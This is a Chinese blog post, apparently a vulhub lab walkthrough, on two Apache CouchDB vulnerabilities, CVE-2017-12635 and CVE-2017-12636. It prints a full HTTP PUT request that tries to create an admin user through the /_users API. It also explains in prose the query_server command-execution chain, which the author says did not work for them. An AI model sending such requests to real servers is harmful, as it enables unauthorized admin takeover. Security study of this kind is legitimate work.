Couchdb

最新推荐文章于 2024-03-05 09:06:25 发布
最新推荐文章于 2024-03-05 09:06:25 发布
阅读量535 收藏 1
点赞数 1
文章标签: couchdb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiwangyizhicunzai/article/details/84204645
版权

Couchdb

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。
使用json api进行查询

默认端口5984

Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。
影响版本:小于 1.7.0 以及 小于 2.1.1

向restful api发送如下数据包

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

直接访问url,用burp抓包
在这里插入图片描述
可以看到只有admin可以添加用户
发送包含两个roles的数据包,即可绕过限制

在这里插入图片描述
添加成功,用户名/密码:vulhub/vulhub登录成功
在这里插入图片描述

Couchdb 任意命令执行漏洞(CVE-2017-12636)

CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。
影响版本:小于 1.7.0 以及 小于 2.1.1

这个漏洞和上面的12635可以组成一个漏洞利用链,这个漏洞的利用前提需要登录用户,利用之前需要用之前的漏洞添加一个账号。

Couchdb 2.x和和1.x的API接口有一定区别,所以这个漏洞的利用方式也不同。

1.x

在这里插入图片描述
给query_servers添加配置的时候出现这种情况,不知道怎么解决…

2.x

2.x相比于1.x加入了集群的概念,所以修改配置的API需要增加node name。
reference:
https://www.anquanke.com/post/id/87256

xiwangyizhicunzai
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CouchDB(1):apache CouchDB介绍与安装
u013938578的博客
12-28 1081
Apache的CouchDB是⼀个免费的开源的数据库。官网:https://couchdb.apache.org/1.schema free (不需要提前设计表)2.documented oriented , json structure data(⾯向⽂档)3.high concurrent (⾼并发)4.RESTful HTTP API (restful ⻛格的http请求形式的API)
超级账本学习笔记(9)-CouchDB
最新发布
weixin_48473914的博客
04-19 677
在第8章Fabric Kafka生产环境部署的环境基础上,把Peer上的LevelDB数据库替换为CouchDB,在每个Peer的配置文件中做相应修改,即可切换为CouchDB数据库,配置以服务器192.168.235.7中的docker-compose-peer.yaml为例,其他服务器参照该yaml配置文件。Docker启动需要修改Peer的yaml配置文件,加入CouchDB的启动配置项,并修改Peer的environment的参数,切换到CouchDB数据库,配置如下。
CouchDB入门
qq_39581763的博客
03-20 399
一、简介Apache CouchDB数据库,它类似于Redis,Cassandra和MongoDB,也是一个NoSQL数据库。 CouchDB将数据存储为非关系性的JSON文档。 这使得CouchDB的用户可以以与现实世界相似的方式来存储数据。 可以从命令行或一个叫作Futon的Web界面来管理CouchDB。 Futon可用于执行管理任务,如创建和操作CouchDB的数据库,文档和...
CouchDB是什么?
unber的博客
03-05 560
CouchDB是由Apache软件基础开发的开源NoSQL数据库,它是用Erlang编程语言编写的。
couchdb
03-25
Apache CouchDB是一个完全包含Web的数据库。 使用JSON文档存储数据。 通过HTTP使用Web浏览器访问文档。 使用JavaScript查询,合并和转换文档。 Apache CouchDB可与现代Web和移动应用程序完美配合。 CouchDB的杀手级...
CouchDB –放松
danpu0978的博客
04-17 131
介绍 Apache CouchDB,通常称为CouchDB,是一个开放源代码数据库,着重于易用性和“完全包含Web的数据库”。 它是一个NoSQL数据库,使用JSON来存储数据,使用MapReduce和HTTP作为API来将JavaScript作为查询语言来存储数据。 它的独特功能之一是多​​主复制。 Couch是不可靠的商品硬件集群的首字母缩写 CouchDB数据库缺少模...
面向文档的数据库 CouchDB
yangwei256的博客
01-03 2832
面向文档的数据库 CouchDB CouchDB 介绍 CouchDB 是一个文档型数据库服务器。与现在流行的关系数据库服务器不同,CouchDB 是围绕一系列语义上自包含的文档而组织的。 CouchDB 中的文档是没有模式的(schema free),也就是说并不要求文档具有某种特定的结构。 CouchDB 的这种特性使得相对于传统的关系数据库而言,有自己的适用范围。一般来说,围绕文档来构建...
CouchDB简单入门
上烟雨心上尘的博客
10-24 186
点击Create Document建立文档。建立View,查看淘宝中各个商品的价格。123456:改成自己密码。admin: 用户名。
Apache CouchDB 代码执行漏洞(CVE-2022-24706)
murphysec的博客
04-27 1441
CVE-2022-24706漏洞是由于3.2.2 版本之前的 CouchDB 的默认配置存在缺陷点, 攻击者可以在未进行身份验证的情况下访问不正确的默认安装进而获得管理员权限。该漏洞影响范围小,建议用户在所有 CouchDB 安装之前安装防火墙。完整的CouchDB api 在注册端口“5984”上可用,这是唯一的需要为单节点安装公开的端口。 编号      CVE-2022-24706 标题 Apache CouchDB 代码执行漏洞 描述 Apache CouchDB是一个开源数据库
Node.Patterns.Databases.Volume.I.LevelDB.Redis.and.CouchDB
05-04
Title: Node Patterns – Databases: Volume I – LevelDB, Redis and CouchDB Author: Pedro Teixeira Length: 149 pages Edition: 1 Language: English Publication Date: 2015-04-08 ISBN-10: B00VV93SV2 Node.js has been designed to do quick and efficient network I/O. It's event-driven streams make it ideal to be used as a kind of smart proxy, often working as the glue between back-end systems and clients. Node was originally designed with that intention in mind, but meanwhile it also has been successfully used to build traditional web applications: an HTTP server that serves HTML pages or replies JSON messages and uses a database to store the data. Even though web frameworks in other platforms and languages have preferred to stick with traditional open-source relational databases like MySQL or PostgreSQL, most of the existing Node web frameworks (like Express, Hapi and others) don't impose any database or even any type of database at all. This bring-your-own-database approach has been in part fed by the explosion in the variety of database servers now available, but also by the ease with which the Node module system and NPM allow you to install and use third-party libraries. In this book we will analyze some of the existing solutions for interacting with some types of databases and what interesting uses can you give them. This first short book on databases starts with some of my favourites: LevelDB, Redis and CouchDB. Table of Contents Chapter 1. The source code Chapter 2. Introduction Chapter 3. An embedded database using LevelDB Chapter 4. Redis Chapter 5. CouchDB
Hyperledger Fabric学习笔记——6.账本存储
polarday的博客
04-29 1530
1.账本存储概念 peer节点做账本存储 orderer是临时存储区块,peer节点是账本存储的持久化,会改变世界状态 文件系统:区块是存储为文件的 区块索引:用于查询区块,是用levelDB实现的 状态数据库:一般存放区块链最新状态,数据不需要HA,可以从文件系统再次获取,couchDB支持模糊查询 2. 交易读写集 交易流程 交易模拟 在背书节点执行模拟时,最终返回交易读写集(RWset),告诉区块链在交易中读写了哪些数据 交易排序 交易验证,交易验证后,更新世界状态
CouchDB学习-集群管理
gr32442187do的博客
12-21 496
集群管理 理论 在etc/fefault.ini文件中有以下部分: [cluster] q=8 n=3 q - 分片的数量 n - 每一份文档的拷贝数量(加上原文档一共几份副本) 创建数据库时可以通过覆盖该值修改为自己的值。 在集群操作中,获取操作中CouchDB返回状态码200或者是写操作返回状态码201即为大多数成员达成一致。大多数成员定义为相关拷贝的数量的一半。对于“读写”操作,...
查看couchdb数据库
sanqima的专栏
08-05 994
couchdb数据库有直接安装版本和docker镜像版本,若是直接安装版本,可以在/opt/couchdb/data里查看器数据库文件,若是docker镜像版本,则需要进入docker终端,才能查看。
【DB宝46】NoSQL数据库之CouchBase简介、集群搭建、XDCR同步及备份恢复
小麦苗DBA宝典
04-06 1332
文章目录一、 CouchBase概述1.1、简述1.2、CouchDB和CouchBase比对1.2.1、CouchDB和CouchBase的相同之处1.2.2、CouchDB和CouchBase的不同之处1.3、CouchBase的社区版和企业版的区别1.4、Couchbase名词术语1.5、Couchbase和RMDB对比1.6、数据同步协议1.6.1、DCP (Database Change Protocol)1.6.2、XDCR (Cross Data Center Replication)二、复制
CouchDB基本使用
YING
04-27 2458
文档 REST API 用来查询、创建、更新和删除文档。具体的用法如下: 1、通过 GET 请求访问 URL/databasename/doc_id可以获取名称为databasename的数据库中 ID 为doc_id文档的内容。文档的内容是一个 JSON 对象,其中以“ _ ”作为前缀的顶层字段是由 CouchDB 保留使用的,如_id和_rev。 2、通过 PUT 请求访问 URL/dat
Hyperledger Fabric 实战(八):couchdb 丰富查询 selector 语法
weixin_34037173的博客
01-14 5070
为什么80%的码农都做不了架构师?>>> ...
hyperledger fabric couchdb
ee-77的博客
03-28 439
目标 记录fabric 由默认leveldb切换到couchdb(目前fabric仅支持将stateLeveldb切换到couchdb)。 观察数据变化 hyperledger fabric leveldb 默认就是leveldb,速度非常快。 hyperledger fabric couchdb 备用DB,couchdb更倾向于做数据管理: 利用Design documents做高级...
CouchDB简介
weixin_42117918的博客
12-16 1046
CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 “Couch” 是 “Cluster Of Unreliable Commodity Hardware” 的首字母缩写,它反映了 CouchDB 的目标具有高度可伸缩性,提供了高可用性和高可靠性,即使运行在容易出现故障的硬件上也...
CouchDB linux 安装
04-09
CouchDB是一个开源的面向文档的NoSQL数据库,它使用JSON格式存储数据,并提供了灵活的查询和复制功能。下面是在Linux系统上安装CouchDB的步骤: 1. 打开终端,使用以下命令安装CouchDB的依赖项: ``` sudo apt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值